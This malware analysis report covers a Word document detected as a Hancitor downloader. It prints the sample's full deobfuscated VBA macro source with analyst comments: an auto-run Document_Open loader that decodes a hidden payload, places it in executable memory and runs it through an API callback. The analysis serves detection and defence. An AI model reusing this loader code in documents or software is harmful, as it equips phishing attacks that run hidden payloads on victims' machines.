Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8e23f3952c148df5…

MALICIOUS

Office (OLE)

136.5 KB Created: 2016-11-10 16:52:00 Authoring application: Microsoft Office Word First seen: 2017-04-07
MD5: 24135d03688b134461cfcedeec37ac60 SHA-1: 560eb04c8bbd19986f8af1cec30cba6697ed5210 SHA-256: 8e23f3952c148df5a87ba5b27430e3724e85dc711f1d800fa46ba1e47f0aa83b
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro — a common way of running code as soon as the document is opened. The VirtualAlloc API reference and the ClamAV signature 'Doc.Downloader.Hancitor-6735733-0' strongly suggest a downloader. The extracted macro source is obfuscated (random-word identifiers, filler loops and song-lyric comments), but it declares VirtualAllocEx, RtlMoveMemory and EnumCalendarInfoA/W under aliased names, which is consistent with an embedded stage being decoded and run in memory before any second-stage download. The overall intent is to download and execute a second-stage payload, likely leveraging the detected Hancitor family's capabilities; the document is likely delivered as a spearphishing attachment.

Heuristics 5

  • ClamAV: Doc.Downloader.Hancitor-6735733-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Hancitor-6735733-0
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Dim vulgum As Integer
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12218 bytes
SHA-256: 7cdf7eb94abbdbe0d7d365438ccccc34dab59d785685ea14fdf23107dc6aee57
Preview script
First 1,000 lines of the extracted script
' --- Module "ThisDocument" (document class module) ---
' Attribute lines are module metadata emitted by the olevba decode, not
' executable statements. VB_PredeclaredId = True is normal for the
' document module; VB_Customizable = True is the line quoted by the
' OLE_VBA_DOCOPEN heuristic above.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Document_Open: auto-executes when the document is opened (the
' OLE_VBA_DOCOPEN finding). The only statement that does real work is the
' bare call to unsheathed (defined further down); everything else here is
' filler — assignments to names that are never read (shame, mascotte,
' patois, annul) and a For loop whose results are discarded.
' No Option Explicit is visible in this module, so the undeclared names
' (shame, moves, patois, ...) are implicit Variants.
Private Sub Document_Open()
Dim vulgum As Integer          ' declared, never used
Dim distrust As String         ' declared, never used
shame = "countess"
mascotte = "warfarin"
unsheathed                     ' decode + stage + trigger the embedded payload (see unsheathed)
For peaceable = 47 To 53       ' filler loop, 7 passes, nothing observable
annul = 53
moves = moves - 409
patois = Replace("pmoses", "moses", "o") & "co"
patois = "mad" & "efaction"
Next peaceable
End Sub
' Open_MSWord: not referenced anywhere in this preview. It reads like a
' benign tutorial snippet pasted in as padding (it creates a new Word
' instance, adds a document and formats some sample text). NOTE(review):
' Range("F6") is a worksheet-style call; in a Word document module it is
' unlikely to resolve, and the On Error GoTo at the top would simply send
' any such failure to the cleanup label — consistent with dead filler.
Sub Open_MSWord()
    On Error GoTo errorHandler
    Dim wdApp As Word.Application
    Dim myDoc As Word.Document
    Dim mywdRange As Word.Range
    Set wdApp = New Word.Application
   
    With wdApp
        .Visible = True
        .WindowState = wdWindowStateMaximize
    End With
   
    Set myDoc = wdApp.Documents.Add
   
    Set mywdRange = myDoc.Words(1)
   
    With mywdRange
        .Text = Range("F6") & " This text is being used to test subroutine." & _
            "  More meaningful text to follow."
        .Font.Name = "Comic Sans MS"
        .Font.Size = 12
        .Font.ColorIndex = wdGreen
        .Bold = True
    End With
   
errorHandler:
   
    ' Release the COM references; also reached on any runtime error above.
    Set wdApp = Nothing
    Set myDoc = Nothing
    Set mywdRange = Nothing
End Sub

' unsheathed: the real entry point, called from Document_Open. It reads
' the encoded payload out of a form-control property, decodes it
' (jaywalker.adenium), stages it in executable memory (cemetery) and then
' triggers it through the EnumCalendarInfo callback parameter. Most of the
' body is filler: While/For loops whose results are dropped and string
' assignments that are never read.
Sub unsheathed()
Dim inodorousness As Long      ' unused
Dim chimakum As Variant        ' unused
' muses is the module at the end of this preview. Its BoundValue("Tab2")
' control is not in the extracted source, but ControlTipText is an MSForms
' control property, so the encoded blob is presumably stored in a control
' tooltip in that form — verify against the form's designer stream.
Set oftness = muses.expedited.BoundValue("Tab2")
mckinley = oftness.ControlTipText
aspleniaceae = 12 + 9236       ' = 9248
leptocephalus = Right(mckinley, aspleniaceae)   ' last 9248 characters = the encoded blob
steeply = jaywalker.adenium(leptocephalus)      ' shifted-base64 decode (see adenium)
walkabout = 6
While walkabout <> 10          ' filler loop, 4 passes
walkabout = walkabout + 1
botuliform = moves Or 491
sterope = sterope
Wend

samarium = "bonduc"
#If VBA6 And Win64 Then
Dim masochistic As Byte
Dim cryogenics As ditto        ' Type from jaywalker; only the filler assignment below touches it
Dim attentive As LongPtr
cryogenics.elseifstatement = 63 + 92 + 113 - 268   ' = 0, never read
Dim creature As String
#Else
Dim computer As Variant
cryogenics = 0
Dim thyroidectomy As Integer
Dim attentive As Long
#End If
davy = 13 - 13
abasia = "busy"
inauspiciousness = "alular"
numismatical = 4096
cheremis = 10
While cheremis <> 15           ' filler loop, 5 passes
cheremis = cheremis + 1
repine = Round(309.713)
mirounga = sterope
Wend

finished = "absorbency"
matador = "passer"
assertion = "strongwilled"
aruru = "ho" & Replace("lbreachy", "breachy", "f")
rebound = 4
While rebound <> 9             ' filler loop, 5 passes
rebound = rebound + 1
repine = Abs(416.383)
sterope = "hupa"
Wend

apportion = steeply
misogynic = "asclepiad"
attentive = cemetery(apportion)   ' address of an RWX buffer now holding the decoded bytes
bumboat = "cade"
' gj is the entry offset into that buffer, chosen per architecture:
' 64-bit: 122 - 48 - 65 + 1271 = 1280; 32-bit: (13 + 100 + 71 + 322) + 3923 = 4429.
#If VBA6 And Win64 Then
Dim experiences As Integer
outrival = Replace("expeptide", "peptide", "c") & LCase$("elLEn") & Mid("bookplatetlybowelless", 10, 3)
achromia = "astronomer"
gj = 122 - 48 - 65 + 1271
#ElseIf Win32 Then
coiled = "unpretending"
councilor = "clerk"
falstaff = 13 + 100 + 71 + 322
gj = falstaff + 3923

#End If
Dim nichrome As String
Dim flaring As Variant
Dim cow As Long
cow = 2048
Dim didactically As Long
' NOTE(review): attentive is LongPtr on 64-bit but didactically is Long, so
' the sum only fits when the allocation lands below 2 GB; otherwise VBA
' raises Overflow here and the chain stops.
didactically = attentive + gj  ' buffer base + entry offset
Dim betimes As Long
betimes = 1
' bookkeeping is EnumCalendarInfoA (x64 declare) / EnumCalendarInfoW (x86).
' The API's first parameter is its enumeration callback pointer, so passing
' didactically makes the OS call into the staged buffer — this is the
' execution step. Detection: VirtualAllocEx(PAGE_EXECUTE_READWRITE) +
' RtlMoveMemory + a callback-taking enumeration API, all from the Word process.
unguem = bookkeeping(didactically, cow, betimes, betimes)
For unsatisfied = 30 To 65     ' filler loop after the call returns
polity = 65
mirounga = sterope
stinger = Replace("eskean", "skean", "x") & "acti" & Replace("ophobic", "phobic", "n")
stinger = Replace("abiff", "biff", "p") & Right("southwesterprentice", 8)
Next unsatisfied

End Sub

' cemetery(fluorine): stages the decoded bytes in executable memory and
' returns the address of that buffer. fluorine is the value returned by
' jaywalker.adenium (declared As String, so it carries the raw decoded
' bytes). This is the function to key on in a sandbox trace:
' VirtualAllocEx with an RWX protection followed by RtlMoveMemory into the
' new region.
Function cemetery(fluorine)
Dim stuccco As Byte            ' unused
Dim hedonic As Integer         ' unused
Dim dita As Long
' RtlMoveMemory(dita, VarPtr(fluorine) + 8, 4): reads 4 bytes from offset 8
' of the VARIANT wrapping the argument. Offset 8 is the VARIANT data slot,
' which for a string Variant holds the BSTR data pointer — so dita
' presumably points at the decoded bytes. Only 4 bytes are read (Long), so
' on 64-bit just the low half of the pointer survives — TODO confirm in a
' debugger.
camphor dita, ByVal VarPtr(fluorine) + 8, 4
Dim errancy As Byte            ' unused
Dim monition As Integer        ' unused
Dim decker As Long
colorful = 0                   ' unused
sociopathic = -1               ' hProcess = -1, the current-process pseudo-handle
stercorarius = 103 + 75 + 32 - 210   ' = 0 -> lpAddress = NULL (let the OS pick)
mirounga = lookdown            ' filler; lookdown's only assignment (in adenium) sits in a branch that never runs

mirounga = lookdown

saturated = 106 - 82 - 62 + 4134     ' = 4096 = 0x1000, MEM_COMMIT
' VirtualAllocEx(-1, NULL, 9419, MEM_COMMIT, 64): 64 = 0x40 is
' PAGE_EXECUTE_READWRITE, i.e. a 9419-byte RWX region in the current
' process. 9419 comfortably exceeds the 6965 bytes copied below.
efface = industry(ByVal sociopathic, ByVal stercorarius, 9419, saturated, 64)
mirounga = lookdown

' RtlMoveMemory(decker, VarPtr(efface) + 8, 4): pulls the returned address
' out of the undeclared Variant efface (again only 4 bytes).
camphor decker, ByVal VarPtr(efface) + 8, 4
orderliness = Fix(203.1325)    ' filler

' RtlMoveMemory(decker, dita, 6965): 108 - 119 + 6976 = 6965 bytes of the
' decoded payload are copied into the RWX region.
camphor ByVal decker, ByVal dita, 108 - 119 + 6976
coaid = 11
While coaid <> 15              ' filler loop, 4 passes, results discarded
coaid = coaid + 1
repine = Fix(134.173)
moves = Int(156.1242)
Wend

cemetery = decker              ' address of the staged payload
End Function


' --- Module "jaywalker": Win32 imports hidden behind random-word names ---
' Every Declare below is aliased; the Alias clause is the real export and
' is what detection content should match on, not the VBA name.
' Names the visible code actually uses: camphor (RtlMoveMemory), industry
' (VirtualAllocEx) and bookkeeping (EnumCalendarInfoA on x64,
' EnumCalendarInfoW on x86). The other imports — OpenClipboard, Sleep,
' SetParent, EndPaint, GetUpdateRect — are not referenced anywhere in this
' preview and look like padding for the import list. The interleaved
' song-lyric comments are filler too.
Attribute VB_Name = "jaywalker"
'Don't it amaze you?
#If VBA6 And Win64 Then
'Love can be so strange
' Type used only by the filler assignment in unsheathed (64-bit branch).
Public Type ditto
'Love can be so strange
elseifstatement As LongPtr
'Don't it astound you?
End Type
'But you're not gonna crack
Public Declare PtrSafe Function averrhoa Lib "user32" Alias "OpenClipboard" (mammuthus As LongPtr) As Boolean
'To understand this crazy world
' EnumCalendarInfoA: first parameter is the enumeration callback pointer;
' unsheathed passes the staged-buffer address there.
Public  Declare PtrSafe Function bookkeeping Lib "kernel32.dll" Alias "EnumCalendarInfoA" (ByVal janua As Any, ByVal acromion As Any, ByVal arable As Any, ByVal anarchy As Any) As LongPtr
'So when nothing seems too certain or safe
' RtlMoveMemory: used by cemetery for the pointer reads and the payload copy.
Public  Declare PtrSafe Sub camphor Lib "ntdll.dll" Alias "RtlMoveMemory" (universal As Any, nitric As Any, ByVal irreclaimable As LongPtr)
'Don't it astound you?
Public Declare PtrSafe Function bilaterality Lib "kernel32.dll" Alias "Sleep" (albula As LongPtr)
'Don't it astound you?
Public Declare PtrSafe Function ancylidae Lib "user32" Alias "SetParent" (ByVal casa As LongPtr, ByVal illness As LongPtr,ist As LongPtr) As LongPtr
'Don't it astound you?
' VirtualAllocEx: cemetery calls it with hProcess = -1 and an RWX protection.
' The first two parameters are declared ByRef here but overridden with
' ByVal at the call site.
Public  Declare PtrSafe Function industry Lib "kernel32.dll" Alias "VirtualAllocEx" (pectoris As LongPtr, decease As LongPtr, ByVal cubit As LongPtr, ByVal nulli As LongPtr, ByVal mansuetude As LongPtr) As LongPtr
'Every time you give yourself away
Public Declare PtrSafe Function bissau Lib "user32" Alias "EndPaint" (annotto As LongPtr,erode As LongPtr) As LongPtr
'Run my baby run my baby run
Public Declare PtrSafe Function disappearing Lib "user32" Alias "GetUpdateRect" (groenendael As LongPtr, brogue As LongPtr,banneret As LongPtr) As Boolean
'Love's an elusive charm and it can be painful

'So you're not gonna crack
#Else
' 32-bit branch: same three working imports under the same VBA names
' (bookkeeping, industry, camphor) so the callers need no #If of their own;
' the W variant of EnumCalendarInfo is used here.
'So you're not gonna crack
Public Declare Function accrue Lib "kernel32.dll" Alias "Sleep" (docile As Long)
'So when nothing seems too certain or safe
Public Declare Function becalm Lib "user32" Alias "EndPaint" (variously As Long, cleistothecium As Long) As Long
'Don't it amaze you?
Public Declare Function asynergic Lib "user32" Alias "SetParent" (ByVal sunday As Long, ByVal butcherbird As Long, fledgling As Long) As Long
'To late for solutions to solve in the setting sun
Public Declare Function picrasma Lib "user32" Alias "OpenClipboard" (unreverberant As Long) As Boolean
'No you're never gonna crack
Public Declare Function bookkeeping Lib "kernel32.dll" Alias "EnumCalendarInfoW" (ByVal beneficiary As Any, ByVal libel As Any, ByVal lightingup As Any, ByVal amphisbaena As Any) As Long
'Let it burn through you
Public Declare Function industry Lib "kernel32.dll" Alias "VirtualAllocEx" (bluefin As Long, contretemps As Long, ByVal microgliacyte As Long, ByVal autoplagiarism As Long, ByVal buteo As Long) As Long
'Love's an elusive charm and it can be painful
Public Declare Sub camphor Lib "ntdll.dll" Alias "RtlMoveMemory" (mauger As Any, sheraton As Any, ByVal semiotics As Long)
'To late for solutions to solve in the setting sun
Public Declare Function kicking Lib "user32" Alias "GetUpdateRect" (irritare As Long, positron As Long, blurred As Long) As Boolean
'So when nothing seems too certain or safe

'Don't it amaze you?
#End If
'Cause life is so short there's no time to waste it
' therm(autonomous): returns the Unicode code point of a character
' (AscW). Wrapper used by adenium to turn each payload character into a
' number; the indirection only serves to hide the AscW call.
Function therm(autonomous)
therm = AscW(autonomous)
End Function
' garner(soapbox, underlining): bitwise And. adenium uses it to mask the
' 24-bit group into its three output bytes; the wrapper exists only so the
' decode loop does not contain a literal And.
Function garner(soapbox, underlining)
garner = soapbox And underlining
End Function
' adenium(cephalotaxus): decodes the 9248-character payload string into
' raw bytes. The scheme is base64 with a 5-position character shift: each
' input character code is incremented by 5 and then looked up in a
' standard base64 reverse table ('A'-'Z', 'a'-'z', '0'-'9', '+', '/').
' Output is 9248 / 4 * 3 = 6936 bytes written into the 6966-byte
' debilitation array (the last 30 entries stay zero). The result is
' returned As String — VBA copies a Byte array into a String byte for
' byte — which is what cemetery later reads through the Variant's BSTR
' pointer. Roughly two thirds of the body is filler (loops with discarded
' results, strings that are never read, constants that are never used).
Function adenium(cephalotaxus) As String
Dim tolerable As String
Dim frieze As Integer

Dim oculomotor As Long
Dim cruetstand(255) As Byte    ' reverse lookup: character code -> 6-bit value
orderliness = orderliness And 90

Dim amphidiploid As Long
moves = Fix(493.268)

Dim bookplate As String

Dim magistracy As Integer

Dim distrain(63) As Long       ' value * 64^3, for the first character of a group
Dim vinegrub(63) As Long       ' value * 64^2, second character
Dim squamule() As Byte
Dim debilitation(6965) As Byte ' decoded output
Dim committeeman As Long
Dim calisaya(63) As Long       ' value * 64, third character
Dim desertful As Integer
Dim cloudcompeller As Long     ' write index into debilitation (starts at 0)
Dim picumnus As Integer

avaunt = 255                   ' mask for the low output byte
Dim defectiveness As Long

Dim parcenary As Byte

' Arithmetic constants; only the ones named in the decode loop matter:
cobwebs = 9 - 62 + 108 + 16711625      ' = 16711680 = &HFF0000
quassation = 65536                     ' = 2^16
aloeaceae = 63                         ' unused
glowingly = 65280                      ' = &HFF00
lowlander = 24 + 87 + 257937           ' unused
megakaryocyte = 262144                 ' = 64^3
outstation = 16515072                  ' unused
back = 256
carbonate = 64
bloodbath = 117 + 119 + 3860           ' = 4096 = 64^2
noneffervescent = 4032                 ' unused
Dim chaetodipterus As Integer
Dim impeccability(9247) As Byte        ' input character codes
suaviter = 105 + 9143                  ' = 9248, matches the Right(, 9248) in unsheathed
For nut = 1 To suaviter
monandry = Mid$(cephalotaxus, nut, 1)
lygaeid = "centigram"
dialect = "troublemaker"
atropos = therm(monandry)              ' AscW
impeccability(nut - 1) = atropos
Next
Dim facade As Long
For abnormalize = 16 To 62             ' filler loop
piggish = 62
mirounga = "ossific"
dosages = Right("bigamyal", 2) & "b"
dosages = LCase$("Con") & "forma" & "nce"
Next abnormalize

bookbinder = 9247
disagree = 35
' Undo the 5-position shift applied to the stored text. (Byte arithmetic:
' a code above 250 would overflow here, so the stored alphabet is
' presumably plain ASCII.)
For crumbled = 0 To bookbinder
impeccability(crumbled) = impeccability(crumbled) + 5
Next crumbled
flatness = 52
suppository = 53
If (flatness - suppository) <> 19 Then ' 52 - 53 = -1, so this branch always runs
flatness = "co" & Right("supplantlumni", 5) & "ation"
orderliness = botuliform / 300
moves = Fix(175.191)
autogamy = "do" & "tted"
Else
lookdown = "ctenidium"                 ' unreachable
suppository = 56
End If

desertful = 0
conductivity = 88 + 25 - 112 + 121
loriinae = 255
' Build the standard base64 reverse table.
For amphidiploid = 0 To loriinae
If (amphidiploid >= 65) And (amphidiploid <= 90) Then
cruetstand(amphidiploid) = amphidiploid - 65     ' 'A'..'Z' -> 0..25
ElseIf (amphidiploid >= 97) And (amphidiploid <= 122) Then
cruetstand(amphidiploid) = amphidiploid - 71     ' 'a'..'z' -> 26..51
ElseIf (amphidiploid >= 48) And (amphidiploid <= 57) Then
cruetstand(amphidiploid) = amphidiploid + 4      ' '0'..'9' -> 52..61
ElseIf amphidiploid = 43 Then
cruetstand(amphidiploid) = 62                    ' '+'
ElseIf amphidiploid = 47 Then
cruetstand(amphidiploid) = 63                    ' '/'
End If
Next amphidiploid
' Precomputed multipliers (ablaze is plain multiplication).
For amphidiploid = 0 To 63
calisaya(amphidiploid) = ablaze(amphidiploid, carbonate)
vinegrub(amphidiploid) = ablaze(amphidiploid, bloodbath)
distrain(amphidiploid) = ablaze(amphidiploid, megakaryocyte)
Next amphidiploid
cautela = 2
While cautela <> 7                     ' filler loop
cautela = cautela + 1
sterope = "lyonia"
botuliform = Round(55.46)
Wend

squamule = impeccability               ' working copy of the shifted input
disaffected = 4
For clathraceae = 5 To 58              ' filler loop
acrobatic = 58
moves = Abs(179.942)
morus = Right("paralyzera", 2) & Replace("tseder", "seder", "ioni")
morus = Right("eubacterialesre", 2) & "seda"
Next clathraceae

aurar = 125 + 13 - 135                 ' = 3, offset of the fourth character in a group
sterope = "accede"

orderliness = Abs(300.843)

atole = aurar + 1
nondisposable = 2
' Decode loop. Next adds 1 and the body adds 3, so it advances 4 input
' characters per pass: oculomotor = 0, 4, ..., 9244 (2312 passes), each
' emitting 3 bytes.
For oculomotor = 0 To bookbinder
minerva = squamule(oculomotor)
aures = squamule(oculomotor + 2)
' 24-bit group: t[c0]*64^3 + t[c1]*64^2 + t[c2]*64 + t[c3]
committeeman = distrain(cruetstand(minerva)) _
 + vinegrub(cruetstand(squamule(oculomotor + 1))) + calisaya(cruetstand(aures)) + cruetstand(squamule(oculomotor + aurar))
amphidiploid = garner(committeeman, cobwebs)             ' And &HFF0000
debilitation(cloudcompeller) = aujordhui(amphidiploid, quassation)         ' \ 65536
amphidiploid = garner(committeeman, glowingly)           ' And &HFF00
debilitation(cloudcompeller + 1) = aujordhui(amphidiploid, back)           ' \ 256
debilitation(cloudcompeller + nondisposable) = garner(committeeman, avaunt) ' And 255
cloudcompeller = cloudcompeller + nondisposable + 1      ' += 3
oculomotor = oculomotor + 3
Next
adenium = debilitation                 ' Byte array -> String, bytes preserved
End Function

' aujordhui(continental, inefficiently): integer division (\). adenium
' uses it to shift the masked 24-bit group down by 16 or 8 bits.
Function aujordhui(continental, inefficiently)
aujordhui = continental \ inefficiently
End Function
  ' Strip_Hyperlinks_Bookmarks_Fields: not referenced anywhere in this
  ' preview; reads like a legitimate housekeeping macro included as
  ' padding. If it were invoked it would delete every hyperlink and
  ' bookmark and unlink every field in the active document. Returns
  ' nothing meaningful (no assignment to the function name).
  Function Strip_Hyperlinks_Bookmarks_Fields()
      Dim myLink As Hyperlink
      Dim myBookmark As Bookmark
      Dim myField As Field
      With ActiveDocument
          For Each myLink In .Hyperlinks
              myLink.Delete
          Next myLink
          For Each myBookmark In .Bookmarks
              myBookmark.Delete
          Next myBookmark
          For Each myField In .Fields
              myField.Unlink
          Next myField
      End With
  End Function

' ablaze(assentment, doubts): plain multiplication. adenium uses it to
' fill the 64-entry multiplier tables (value * 64, * 64^2, * 64^3).
Function ablaze(assentment, doubts)
ablaze = assentment * doubts
End Function


' --- Module "muses": form module referenced by unsheathed ---
' Only the attribute header survives in the extracted source. A VB_Base
' value of the form 0{GUID}{GUID} is the shape olevba emits for a
' UserForm (presumably; not confirmed here). unsheathed reads
' muses.expedited.BoundValue("Tab2").ControlTipText, so the encoded
' payload is presumably stored in a control tooltip in this form's designer
' stream, which the preview does not include — extract the form storage
' to recover the blob.
Attribute VB_Name = "muses"
Attribute VB_Base = "0{BF703C55-4447-474E-B776-20B249E82C65}{9245A813-65D3-40A1-915C-6E7B51C01726}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False